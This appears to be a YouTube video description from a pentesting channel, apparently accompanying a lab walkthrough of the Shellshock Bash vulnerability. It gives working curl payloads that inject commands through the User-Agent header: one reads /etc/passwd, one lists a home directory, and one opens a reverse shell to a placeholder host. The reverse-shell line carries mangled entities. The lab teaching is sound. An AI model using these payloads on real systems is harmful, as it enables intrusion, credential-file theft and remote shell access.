#Exploit-DB #ShellShock #RemoteCommandInjection #PentestHint #pentesthint #chandanghodela
Join this channel to get access to perks:
/ @pentesthint
What is Shellshock?
Shellshock is a critical bug in Bash versions 1.0.3 - 4.3 that can enable an attacker to execute arbitrary commands. Some web servers (including Apache) support the Common Gateway Interface (CGI) specification which allows CLI programs to be used to generate dynamic pages.
To check if the site is vulnerable to Shellshock, we can run the following code:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' example.com//cgi-bin/test.cgi
Ryan's Directory
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/ls -al /home/ryan/' bash -s :'' 10.10.155.108//cgi-bin/test.cgi
Reverse Connection:
curl -H 'User-Agent: () { :; }; /bin/bash -i gt& /dev/tcp/YourIP/YourPort 0gt&1' example.com/cgi-bin/test.cgi
Notes: drive.google.com/file/d/1-yk1...
Exaploit-DB: www.exploit-db.com/exploits/3...
----------------------------------------------------------------
Follow:
Twitter: / chandanghodela
Instagram: / chandan.ghodela
LinkedIn: / chandan-singh-ghodela
16 авг 2022